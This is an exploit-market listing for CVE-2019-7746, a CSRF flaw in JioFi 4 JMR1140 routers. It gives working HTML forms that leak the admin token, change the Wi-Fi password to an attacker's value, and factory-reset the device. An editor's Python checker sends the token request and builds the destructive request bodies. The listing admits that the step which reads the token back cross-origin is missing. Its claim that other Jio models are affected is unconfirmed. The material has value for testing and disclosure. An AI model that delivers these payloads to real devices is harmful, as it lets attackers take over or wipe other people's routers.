0day Today Exploits Market and 0day Exploits Database

Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - CSRF (Admin Token Disclosure) Vulnerability

Author
Ronnie T Baby
Risk
Security Risk Low
0day-ID
0day-ID-32173
Category
web applications
Date added
13-02-2019
CVE
CVE-2019-7746
Platform
hardware
# Exploit Title: Jiofi 4 (JMR 1140) CSRF To Leak Admin Tokens to Change Wi-Fi Password or Factory Reset Router
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7746

Description:

JioFi 4 JMR1140 devices running firmware Amtel_JMR1140_R12.07 allow remote attackers to obtain the admin token by making a /cgi-bin/qcmap_auth request with type=getuser and reading the token field of the JSON response. That token can then be used to change the Wi-Fi password or perform a factory reset.

PoC:

The exploit requires two CSRF requests to be delivered to a victim who is connected to the JioFi router and logged in to its web interface. Each request is shown below as an HTML form the victim's browser submits. Note that a plain cross-origin form POST does not expose the response body to the attacker's page; the advisory does not show how the token returned by the first request is read back, only that it is then reused in the second.

1. First, obtain the admin token:

<html>
  <!-- CSRF PoC step 1: make the victim's browser POST type=getuser to the auth CGI -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_auth" method="POST">
      <input type="hidden" name="type" value="getuser" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Example response:

{"super_user_id":"administrator", "oper_user_id":"operator", "end_user_id":"admin", "token":"leakedtokens"}

Choice A) Change the Wi-Fi password of the JioFi 4 (JMR 1140) router to a value of the attacker's choice.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
      <input type="hidden" name="Page" value="SetWiFi&#95;Setting" />
      <input type="hidden" name="Mask" value="0" />
      <input type="hidden" name="result" value="0" />
      <input type="hidden" name="ssid" value="JioFi4&#95;08FE5F" />
      <input type="hidden" name="mode&#95;802&#95;11" value="11bgn" />
      <input type="hidden" name="tx&#95;power" value="HIGH" />
      <input type="hidden" name="wmm" value="Enable" />
      <input type="hidden" name="wps&#95;enable" value="PushButton" />
      <input type="hidden" name="wifi&#95;security" value="WPA2PSK" />
      <input type="hidden" name="wpa&#95;encryption&#95;type" value="AES" />
      <input type="hidden" name="wpa&#95;security&#95;key" value="Iamhacked" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;1" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;2" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;3" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;4" value="0" />
      <input type="hidden" name="wep&#95;current&#95;default&#95;key" value="0" />
      <input type="hidden" name="channel&#95;mode" value="automatic" />
      <input type="hidden" name="channel&#95;selection" value="11" />
      <input type="hidden" name="sleep&#95;mode" value="Enable" />
      <input type="hidden" name="sleep&#95;mode&#95;timer" value="30" />
      <input type="hidden" name="ssid&#95;broadcast" value="Enable" />
      <input type="hidden" name="enable&#95;wifi" value="Enable" />
      <input type="hidden" name="token" value="leakedtokens" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The Wi-Fi password is changed to Iamhacked.

Choice B) Perform Remote Factory Reset

<html>
  <!-- CSRF PoC step 2, choice B: factory reset using the token leaked in step 1 -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
      <input type="hidden" name="type" value="FRST&#95;REAL" />
      <input type="hidden" name="token" value="leakedtokens" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The router reboots to default settings.
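The following script is an added example written by the editor, not code from the advisory or its author. It turns the two-step procedure above into a non-destructive check: it sends only the step-1 getuser request and reports whether a token field comes back, and it builds (but does not send) the SetWiFi_Setting and FRST_REAL bodies from the PoC so a tester can see exactly what a follow-up request would carry. Assumptions not stated in the advisory: the device is reachable at BASE_URL (the jiofi.local.html host the PoC forms use; change it for your network), and because the advisory does not say whether getuser needs a logged-in session, an optional Cookie header can be passed. The HTTP transport is injectable so the logic can be exercised against a constructed response.

```python
"""Non-destructive check for the JioFi 4 admin token disclosure (editor's
example, not the advisory's code). Only the getuser request is sent; the
Wi-Fi change and factory reset bodies are built for inspection only.
"""
import json
import sys
import urllib.parse
import urllib.request

BASE_URL = "http://jiofi.local.html"      # host used in the PoC forms (assumption: change for your LAN)
AUTH_PATH = "/cgi-bin/qcmap_auth"         # step 1: type=getuser
CGI_PATH = "/cgi-bin/qcmap_web_cgi"       # step 2: SetWiFi_Setting or FRST_REAL


def encode_form(params):
    """Encode params as application/x-www-form-urlencoded bytes, as a browser form would."""
    return urllib.parse.urlencode(params).encode()


def getuser_body():
    """Body of the step-1 request from the PoC."""
    return encode_form({"type": "getuser"})


def extract_token(body):
    """Return the 'token' string from a getuser JSON response, or None.

    A login page, an error page, a non-object JSON body or an empty token all
    yield None, so a non-vulnerable or patched device is not misreported.
    """
    try:
        data = json.loads(body)
    except (TypeError, ValueError):
        return None
    if not isinstance(data, dict):
        return None
    token = data.get("token")
    return token if isinstance(token, str) and token else None


def set_wifi_body(token, ssid, psk):
    """Body for choice A (SetWiFi_Setting); fixed values are the PoC's defaults."""
    params = {
        "Page": "SetWiFi_Setting", "Mask": "0", "result": "0",
        "ssid": ssid, "mode_802_11": "11bgn", "tx_power": "HIGH",
        "wmm": "Enable", "wps_enable": "PushButton",
        "wifi_security": "WPA2PSK", "wpa_encryption_type": "AES",
        "wpa_security_key": psk,
        "wep_security_key_1": "0", "wep_security_key_2": "0",
        "wep_security_key_3": "0", "wep_security_key_4": "0",
        "wep_current_default_key": "0",
        "channel_mode": "automatic", "channel_selection": "11",
        "sleep_mode": "Enable", "sleep_mode_timer": "30",
        "ssid_broadcast": "Enable", "enable_wifi": "Enable",
        "token": token,
    }
    return encode_form(params)


def factory_reset_body(token):
    """Body for choice B (FRST_REAL). Destructive if sent: build only."""
    return encode_form({"type": "FRST_REAL", "token": token})


def http_post(url, body, cookie=None, timeout=5):
    """Real transport: POST a form body and return the response text."""
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    if cookie:  # assumption: the advisory does not say whether a session is required
        req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def check_token_disclosure(post=http_post, base_url=BASE_URL, cookie=None):
    """Send only the getuser request and report whether a token came back.

    post(url, body, cookie) is injectable so the check can run against a
    canned response without a device on the network.
    """
    body = post(base_url + AUTH_PATH, getuser_body(), cookie)
    token = extract_token(body)
    return {"vulnerable": token is not None, "token": token}


if __name__ == "__main__":
    # usage: python check_jiofi_token.py [base_url] [cookie]
    args = sys.argv[1:]
    result = check_token_disclosure(
        base_url=args[0] if args else BASE_URL,
        cookie=args[1] if len(args) > 1 else None,
    )
    print("token disclosed" if result["vulnerable"] else "no token in response")
```

Run it from a client connected to the JioFi hotspot; a JSON reply containing a non-empty token field means the device hands out the value the PoC reuses in step 2. The two body builders exist so the follow-up requests can be reviewed in a proxy or a test harness; sending them to a real device changes its configuration or wipes it.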


Note: I believe this works on all other Jio routers as well, viz. the Jio JMR 540 and JioFi M2, as they all share a similar web interface. I have not confirmed this.

#  0day.today [2024-09-28]  #